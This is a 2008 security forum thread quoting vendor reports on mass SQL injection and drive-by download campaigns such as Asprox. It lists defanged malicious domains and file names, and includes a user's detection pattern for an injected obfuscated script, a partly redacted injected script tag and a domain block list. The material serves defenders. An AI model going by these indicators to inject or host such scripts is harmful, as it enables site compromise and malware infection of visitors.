* http://preview.tinyurl.com/5cyo99
June 26, 2008 (ScanSafe STAT blog) - "The Asprox botnet began pumping out a fresh round of SQL injection attacks yesterday... The Asprox botnet causes infected computers (bots) to become the attack mechanism. Some of the bots are instructed to upload the SQL injection attack tool, which then queries search engines to find susceptible sites and attempts to exploit any found. Successful exploit results in compromised websites that silently attempt to infect visitors' computers. Other bots are used as hosts for the malware; these hosts appear to be using the Neosploit framework. Asprox uses fast flux, thus a single malware domain called by the compromised site may resolve to one of a number of IP addresses (i.e. one domain name may resolve to any one of a number of attacker-controlled victim computers commandeered to act as malware hosts)... a large number of the trafficked compromised sites appear to be from the manufacturing sector, particularly among companies involved in the manufacture or distribution of heating and cooling systems... the malware dropped in the June SQL injection attacks has shifted to backdoors and proxy Trojans - infections which add to the overall size of the Asprox botnet. The June attacks also appear to have some roots in the Ukraine and Malaysia, rather than China..."

:!: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#27 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 01 July 2008 - 04:39 AM

FYI...

More SQL Injection with Fast Flux hosting
- http://isc.sans.org/...ml?storyid=4645
Last Updated: 2008-07-01 04:46:52 UTC ...(Version: 5) - "...More fast flux domains redirecting to other domains which then redirect to the malware site. What's interesting about this one is it doesn't look like they are using exploits to install the malware, they are redirecting to a fake AV site which fools users into installing the malware. Some of the domains hosting the injected js are as follows:
hxxp :// updatead .com
hxxp :// upgradead .com
hxxp :// clsiduser.com
hxxp :// dbdomaine.com
b.js then redirects to several domains which host a cgi script
hxxp :// kadport .com /cgi-bin/indes.cgi?ad
hxxp :// hdadwcd .com /cgi-bin/index.cgi?ad
Which then redirects to ad.js which redirects the user to
hxxp :// spyware-quick-scan .com?wmid=1041&I=14&it=1&s=4t
This site attempts to trick the user into installing installer.exe
AV coverage is decent:
http://www.virustota...945cbff173e67d8
...This post has a nice running list of domains: http://infosec20.blo...and-iframe.html
The cause seems to be the ASPROX bot kit, which got some SQL injection capabilities in mid-May, see http://www.heise-onl...l--/news/110742 .
Dr. Ulrich's post http://isc.sans.org/...ml?storyid=4565 lays out very nicely how it all happens... The folks at ShadowServer are keeping a comprehensive and updated list at:
http://www.shadowser...lendar.20080514
Page last modified on July 01, 2008, at 10:16 AM ..."

:grrr: :ph34r: :!:

Edited by apluswebmaster, 01 July 2008 - 03:24 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#28 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 03 July 2008 - 04:16 AM

FYI...

Detecting scripts in ASF files
- http://isc.sans.org/...ml?storyid=4664
Last Updated: 2008-07-03 08:11:02 UTC - "Back in April, I wrote a diary about an interesting ASF files that had a script stream included ( http://isc.sans.org/...ml?storyid=4355 ).The script stream caused Windows Media Player to use Internet Explorer to retrieve content from a URL embedded in the script. As you can probably already guess, the URL lead to a web site serving some malware. Some other AV vendors picked this as well. I asked if some of our readers know of a utility that would allow us to extract script streams from ASF files. Initially I found that there is a utility from Microsoft, Windows Media File Editor, that allows one to list script commands. One of our readers, James Dean, did a great job and wrote a small utility that allows you to list embedded script commands from command line, without using any GUI tools. This is great for batch analysis of multiple ASF files. You just need to create a directory, put all ASF files into it and run the tool with the directory name as a parameter... I compiled it for Windows. You can download the ZIP archive here*. MD5 of the ZIP archive is c9e5bba11051cfbc98dfa451442a71e8. With some modifications this can work on Linux as well – if you have time to modify the code let us know and we'll post the code for Linux as well since a lot of researchers use it..."
* http://handlers.sans...asfcommands.zip

:!:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#29 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 03 July 2008 - 10:12 AM

FYI...

Sony PlayStation website hacked
- http://www.theregist...aystation_hack/
3 July 2008 - "Gamers visiting the US Sony PlayStation website risk malware infection after the site was hit by hackers. SQL injection vulnerabilities on the site were used by miscreants to load malicious code on pages showcasing the PlayStation games SingStar Pop and God of War, net security firm Sophos reports*. The code promotes scareware to visitors, which falsely claims that their computers are infected with computer viruses to frighten them into purchasing software of little or no security utility... Sophos informed Sony of the website vulnerabilities, which were purged by Thursday morning. The attack is the latest in a wave of SQL injection attacks that have turned the websites of legitimate organisations into conduits for drive-by download assaults. Recent victims have included the website of tennis regulators ITF and ATP, the professional players tour and Wal-Mart. Large-scale SQL Injection attacks starting around October 2007 have hit a large number of small sites as well as high-profile targets..."
* http://www.sophos.co...08/07/1540.html

:!:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#30 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 04 July 2008 - 06:50 AM

Update... 7.4.2008

- http://atlas.arbor.n...ummary/fastflux
"...Currently monitoring -6508- fastflux domains..."


:shock:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#31 scorpiotiger

scorpiotiger

    Member

  • Full Member
  • Pip
  • 71 posts

Posted 04 July 2008 - 02:39 PM

Do Hosts run virus checkers on their servers regularly? I would think they would... especially shared hosting servers.

??

#32 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 04 July 2008 - 08:12 PM

Do Hosts run virus checkers on their servers regularly?...

Er, I think you may have missed the point of this thread.

These java-script injection/hacks made on the servers are -not- viruses, and wouldn't be caught by most AV's.

The *.js file is usually a -redirect- to a site that contains "drive-by malware", or exploits known vulnerabilities in browsers or other online applications, which is why it pays to stay "up-to-date".


:!:

Edited by apluswebmaster, 04 July 2008 - 08:14 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#33 scorpiotiger

scorpiotiger

    Member

  • Full Member
  • Pip
  • 71 posts

Posted 04 July 2008 - 08:36 PM

Do Hosts run virus checkers on their servers regularly?...

Er, I think you may have missed the point of this thread.

These java-script injection/hacks made on the servers are -not- viruses, and wouldn't be caught by most AV's.

The *.js file is usually a -redirect- to a site that contains "drive-by malware", or exploits known vulnerabilities in browsers or other online applications, which is why it pays to stay "up-to-date".


:!:


no.. I didn't miss the point.

and.. I went to show a friend of mine an infected page, and when he went to download it to his pc to look at it, his virus checker wouldn't let him do it.

and that makes sense, because these things are just "a javascript". they are javascripts with certain patterns and placed in certain spots.

example, recently, I cleaned up a site that was infected by a gpack exploit. I looked for those records modified within 5 minutes of the expoit I found, and looked on the last line for
<script>enum(unescape("
followed by a bunch of escaped characters which translated to a sequence where the 58.65.232.33 (ip of a hong kong site) was in the unescaped text. - followed by
")); </script>

this is pattern checking just like any other virus/spyware pattern checking. Granted.. the patterns aren't usually known until the fox gets into a lot of henhouses.. but once it is known, I would think there would be, if not a server virus checker, then some scripts written that would check a person's site and flag any similar patterns for inspeciton by the owner.

The site I cleaned up was small.. but that's what I probably would have ended up doing if the site had been bigger.

Edited by scorpiotiger, 05 July 2008 - 01:14 AM.


#34 scorpiotiger

scorpiotiger

    Member

  • Full Member
  • Pip
  • 71 posts

Posted 04 July 2008 - 08:44 PM

However, apluswebmaster, I do want to thank you for posting this information. The reason I'm here is because I was looking for ways to prevent this from happening again.

#35 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 06 July 2008 - 08:29 AM

FYI...

- http://www.shadowser...lendar.20080705
5 July 2008 - "...People are saying they were compromised by SQL Injection, but when I dig a little deeper I find that what actually happened was some user went to somegoodsite.com and ended up compromised. If you're one of those people, this blog's for you...
Understanding the Danmec/Asprox Attacks...
Basically, the attacker launches an SQL injection attack against somegoodsite.com. SQL injection attacks try to exploit trust relationships between web applications and the databases that support them in order to add, remove or modify data in databases in ways it was never intended. In the case of the Danmec/Asprox attacks, the intent of the SQL injection is to add a single line of HTML code to the database so that somegoodsite.com will present it to every user who visits the site.
The initial code has been an HTML "script" command, which is used to define a segment of code for your browser to run. The difference in the Asprox/Danmec attacks though, is that the code segment to run is malicious javascript hosted at evilsite.net. This is called a drive-by download.
Innocent user wasn't targeted directly by the attacker's SQL injection. Instead, innocent user was harmlessly surfing the web during his 1 hour lunch break and got something more than he bargained for from somegoodsite.com. Evilsite.net then looks at the information presented by innocent user's system and determines that evilsite2.net is hosting an exploit that should be effective. Evilsite.net then issues an IFRAME redirect command telling innocent user's browser to contact evilsite2.net (all without any interaction from innocent user). Finally, evilsite2.net provides a working exploit which compromises innocent user's machine. These compromises can be in the form of keyloggers, botnets, backdoors, or any other nasiness an attacker can drum up. Since this exploit is reliant on innocent user's web client downloading and executing the malicious code on its own, we call this a client-side attack.
So the moral of the story is that somegoodsite.com got compromised by SQL injection. Your users got compromised by redirects, drive-by-downloads and client-side attacks."

(Graphic available at the Shadowserver URL above.)

:!:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#36 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 17 July 2008 - 03:52 AM

FYI..

Governmental, Healthcare, and Top Business Websites have fallen victims to the new round of Asprox mass attack
- http://www.finjan.co...px?EntryId=2002
Jul 16, 2008 - "... The attack toolkits is designed to first search Google for webpages with the file extension [.asp] and then launch SQL injection attacks to append a reference to the malware file using the SCRIPT tag. During the first two weeks of July 2008, Finjan... detected over 1,000 unique Website domains that were compromised by this attack. Each of the compromised domains included a reference to a malware that was served by over 160 different domains across the Internet. Since the list of these malware serving domains increases every day, we believe this is just the tip of the iceberg for the scope and impact of this attack. Among the compromised websites we found were those of respectable organizations, governmental institutes, healthcare organizations as well as high-ranked websites... Each of the 160 different domains hosting [b.js] and [ngg.js] [fgg.js] points to the location of the malicious file which was unique to each and every one of them.
The pointed iframe loads an obfuscated JavaScript code which then downloads and executes the malware on the victim machine automatically. The exploit provided by writers of the new version of NeoSploit toolkit, which uses a refreshing code for the obfuscation (using the location of the page as part of the obfuscation function)... The malicious code of the above script exploits several vulnerabilities on the victim’s machine in order to heighten the chances for successful exploitation:
* MDAC Vulnerability
* QuickTime rtsp Vulnerability
* AOL SuperBuddy ActiveX Control Code Execution Vulnerability
Upon successful exploitation, a Trojan is downloaded and executed on the victim’s machine..."

(Screenshots available at the URL above.)

Also see:
- http://www.shadowser...lendar.20080705

//
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#37 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 19 July 2008 - 05:23 AM

FYI...

- http://preview.tinyurl.com/6mgej5
July 16, 2008 - "...According to the latest ScanSafe Global Threat Report:
1. Malware Increases 278 Percent: Web-based malware increased 278 percent as more and more legitimate sites including Wal-Mart, Business Week, Ralph Lauren Home and Race for Life were compromised. This widespread compromise of legitimate websites was largely the result of automated attack tools which became freely availably in the last months of 2007.
2. SQL Injection Attacks Outpace Other Attacks by 212 Percent: SQL injection attacks, an exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data, have rapidly become the most common form of website compromise, outpacing all other types of compromise by 212 percent. In June, SQL injection attacks accounted for 76 percent of all compromised sites.
3. Password Stealers and Backdoor Trojans Most Commonly Blocked Malware—Putting Corporate Data at Risk: Most of the compromises attempt to install password stealers and backdoor Trojans. This category of malware increased from 4 percent of malware in January to 27 percent in June.

The ScanSafe Global Threat Report is a study of the more than 60 billion Web requests it scanned and 600 million Web threats it blocked from January through June 2008 on behalf of corporate customers in more than 60 countries across five continents. It represents the world’s largest security analysis of real-world corporate Web traffic. A full copy of the report is available at http://www.scansafe....hreat_reports2/ ."

//
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#38 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 21 July 2008 - 10:04 AM

FYI...

SQL Injection List - Format Update
- http://www.shadowser...lendar.20080718
18 July 2008 - "Due to popular demand, the SQL Injection list maintained at http://www.shadowser...lendar.20080514 can be fetched in text form at http://www.shadowser...ql-inj-list.txt
Unfortunately this means the original web page will change somewhat, and I apologize for this. However, this will be better in the long run."

//
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#39 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 24 July 2008 - 05:15 AM

FYI...

- http://isc.sans.org/...ml?storyid=4771
Last Updated: 2008-07-24 07:47:29 UTC - "...it appears that the attackers expanded their target list of applications so they try to attack Cold Fusion applications now as well (previously they tried to attack ASP scripts only). If you are running Cold Fusion applications, this should be a wake-up call for you – make sure that you are not vulnerable to SQL injection. If I remember correctly, Cold Fusion does have some built-in protection against SQL injection attacks but there are clearly cases when that does not work (otherwise the attackers would not be attacking it)... It's actually a very common way that is used by hackers when they are exploiting blind SQL injection attacks. The idea is to create a condition that, if satisfied, will delay the execution of the script for a certain time period. So, the attacker watches the response time and if it was delayed, he knows that the SQL command was executed successfully. Here we're not talking about the blind SQL injection, but just a way to check if the script is vulnerable to SQL injection in general. So, the bot issues this command and checks the response time: if the reply came immediately (or in couple of seconds, depending on the site/link speed) the site is not vulnerable. If the reply took 20 seconds then the site is vulnerable. This gives them an easy way to detect vulnerable sites and (probably) create a list of such sites that they might attack directly in the future. And the site owner will not notice anything (unless he/she is checking the logs)..."

//
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#40 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 08 August 2008 - 07:37 AM

FYI...

SQL Injection Attacks Targeting Chinese-oriented Sites
- http://www.f-secure....s/00001482.html
August 8, 2008 - "...in conjunction with the Beijing 2008 Olympics Games, and with ‘China’ being one of the more popular search engine keywords at the moment, it makes sense for malware writers to focus their attention on the Chinese web – and we’ve been seeing some interesting examples of SQL injection attacks specifically targeting website designed for a Chinese audience, whether from the mainland or overseas. Like most SQL injection attacks, these attacks begin with a compromising script being injected into a legitimate site, compromising it and redirecting its users to a malicious website. This website then takes advantage of the vulnerabilities available on the user’s computer to download and execute malicious programs... a specially crafted Flash file exploiting Adobe Flash Player Integer overflow (CVE-2007-0071) is also served. When the webpage is loaded, it forcefully floods the user’s computer memory beyond its capacity, then takes advantage of the computer’s attempts to correct the problem to execute its own hidden code. If the user hasn’t updated their Flash Player* to newer versions than those targeted, their computer is vulnerable..."

* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version 9.0.124.0

//
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#41 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 08 August 2008 - 10:56 AM

FYI...

More SQL Injections ...active NOW
- http://isc.sans.org/...ml?storyid=4844
Last Updated: 2008-08-08 16:40:52 UTC - "... Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
Next:
A user visiting the site will hit w.js which, if they are using english, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html ... These file contains some java script... So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT (Virustotal) detect the file as malicious and for FF 10/36 detect the file as being malicious.
yahoo.htm
The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute...
Office.htm
Attempts to create activeX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe
ksx.htm
Attempts get the browser to include the rondll32.exe file. Detection for rondll32.exe is good with most AV products catching this one.
06014.htm
was unavailable at the time I checked.

These attacks are happening right now. The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops."

//
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#42 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 22 August 2008 - 07:09 PM

FYI...

Sunkist site - mass JavaScript injection
- http://securitylabs....lerts/3167.aspx
08.22.2008 - "Websense... has discovered that a Sunkist site is infected with a mass JavaScript injection that delivers a malicious payload. The reporting page on the Sunkist NewsLINK site contains malicious JavaScript code that loads malicious payloads from -nine- different hosts. Sunkist is a popular drink in the USA, Canada, UK, Australia, and other parts of the world..."

(Screenshot of the infected site available at the URL above.)

//
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#43 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 29 August 2008 - 06:06 AM

FYI...

- http://www.darkreadi...o...&print=true
AUGUST 27, 2008 - "...Attackers have begun hiding the malicious code by encoding so they can keep using these old-school attacks... ScanSafe today reported* an 87 percent jump in malware blocked by its Web security service in July compared with June, 75 percent of which came from the wave of SQL injection attacks hitting Websites the past few months. ScanSafe detected 34 percent more malware last month than it did in all of 2007, according to the report..."
* http://www.scansafe....008_GTR_rev.pdf
"...ScanSafe reported a 278% increase for the first six months of the year. That alarming trend continued in July with the number of Web-based malware blocks increasing another 87% over the previous month. The majority of the increase in Web-based malware resulted from ongoing web-site compromises which represented 83% of all malware blocks for the month. 75% of all malware blocks were the result of SQL injection attacks, the majority of which were related to the Asprox fast flux botnet. The Asprox botnet is believed to have origins in Russia and has commercial interests ranging from spam and clickfraud to rogue anti-spyware software and backdoor Trojans. July 2008 also bore witness to an increase in social engineering email scams designed to install malware on victims computers. 95% of ScanSafe customers fell for the scams and attempted to clickthrough to the malicious site, which represented 1.3% of all malware blocks for the month..."

:ph34r: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#44 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 16 September 2008 - 07:01 AM

FYI...

SQL injection ...BusinessWeek.com
- http://www.sophos.co...sinessweek.html
15 September 2008 - "Hundreds of webpages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected. According to Sophos, hackers used an SQL injection attack - where a vulnerability is exploited in order to insert malicious code into the site's underlying database - to pepper pages with code that tries to download malware from a Russian web server..."

(Video available at the URL above.)

:techsupport:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#45 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 18 September 2008 - 03:51 AM

FYI...

SQL threat: All Your (Data)base Are Belong to Trojan.Eskiuel...
- http://preview.tinyurl.com/45qhsy
09-17-2008 (Symantec Security Response Blog) - "...Our honeypot servers are full of plenty of worms that spread by email, IM, file-sharing, or network vulnerabilities, so finding a Trojan that targets SQL databases is always an unusual surprise for a virus researcher... new SQL threat: Trojan.Eskiuel*. The main functionality of this threat is to scan the Internet to find machines with poorly configured SQL servers (i.e. with weak or non-existing passwords), gain access to them, and use their stored procedures in order to download new malware from a remote host. The anatomy of the attack is pretty simple. When run, the threat will read the IP address passed as an input parameter in the command line, and will start scanning all of the class B subnet of that IP address, looking for an SQL server... Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights... Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally or remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures."
* http://www.symantec....-091215-0809-99

(Screenshots and more detail available at both URL links above.)

:ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#46 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 29 September 2008 - 06:03 AM

FYI...

ASPROX mutant
- http://isc.sans.org/...ml?storyid=5092
Last Updated: 2008-09-29 10:22:25 UTC - "...ongoing SQL injections... The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary*), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist... in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal**)..."
* http://isc.sans.org/...ml?storyid=4565

** http://www.virustota...41d7ae62c126fff

:ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#47 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 14 October 2008 - 12:06 PM

FYI...

China Business Network Rail Site Infected with Mass Script Injection
- http://securitylabs....lerts/3207.aspx
10.14.2008 - "Websense... discovered today that the China Business Network Rail Web site has been infected with the mass attack JavaScript injection to deliver a malicious payload. The reporting page on the site contains partially obfuscated malicious JavaScript code that, through numerous redirects, loads numerous exploit code. Applications targetted include a GLWorld ActiveX Control, Real Player, a UUSE P2P streaming application, and Xulnei Thunder DapPlayer... Websense ThreatSeeker has been tracking how such attacks prevail over reputed Business-to-Business (B2B) and Business-to-Clients (B2C) Web sites to target their peers and other visitors..."

(Screenshots available at the URL above.)

:ph34r: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#48 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 17 October 2008 - 09:32 AM

FYI...

Adobe site - SQL injected...
- http://www.sophos.co...08/10/1863.html
16 October 2008 - "At the end of last week SophosLabs discovered that Adobe’s website was linking to a site infected with Mal/Badsrc-C. The infection had been encountered by a business partner of ours... Digging deeper, we discovered that the infected site was actually now part of the Adobe empire following an acquisition in October 2006. Some of the infected webpages have subsequently been rebranded but the underlying databases serving the site are still riddled with infections... The threat from web-based malware is increasing by the day and the fact the it can happen to companies as large as Adobe should make all web admins sit up and take notice.
NOTE/update: Last night Adobe contacted us and indicated that the issue had been resolved. I can confirm that the issue has been resolved."
- http://www.theregist...ked_abobe_page/

(Screenshot available at both URLs above.)

:!: :grrr:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#49 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 04 November 2008 - 06:22 PM

FYI...

ECPAT NZ INC Courtesy Site: Mass Injection
- http://securitylabs....lerts/3227.aspx
11.04.2008 - "Websense... has discovered that an ECPAT NZ INC courtesy site is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been mass injected attempting to deliver malicious payloads from 20 different hosts. ECPAT is a global network of organizations and individuals working together for the elimination of child prostitution, child pornography, and the trafficking of children for sexual purposes. ECPAT NZ plays a key role in liaising and bringing about cooperation between key government and sector groups involved in the areas of commercial sexual exploitation of children (CSEC). In an effort to protect their visitors, Websense Security Labs is working closely with ECPAT NZ INC to advise on the threats on their Web site. The ThreatSeeker Network has been tracking how such attacks prevail over reputed and significant Web sites, targeting their peers and other visitors..."

(Screenshots available at the URL above.)

:eek: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#50 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 08 November 2008 - 03:41 PM

FYI...

- http://www.viruslist...logid=208187604
November 07, 2008 | 16:31 GMT - "...onset of the latest mass hack attack – websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days alone, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this... We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen. One common factor is that the majority of the hacked sites run on some type of ASP engine... The attackers add a tag, <script src=http://******/h.js>, to the html of hacked sites. The link leads to Java Script located on one of six servers – these servers act as gateways for further redirecting of requests. We’ve identified six of these gateways and they’ve been added to the blacklist in our antivirus:
* armsart.com
* acglgoa.com
* idea21.org
* yrwap.cn
* s4d.in
* dbios.org
If you’re an admin, you should block access to these sites..."

:ph34r: :grrr:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.




Member of UNITE
Support SpywareInfo Forum - click the button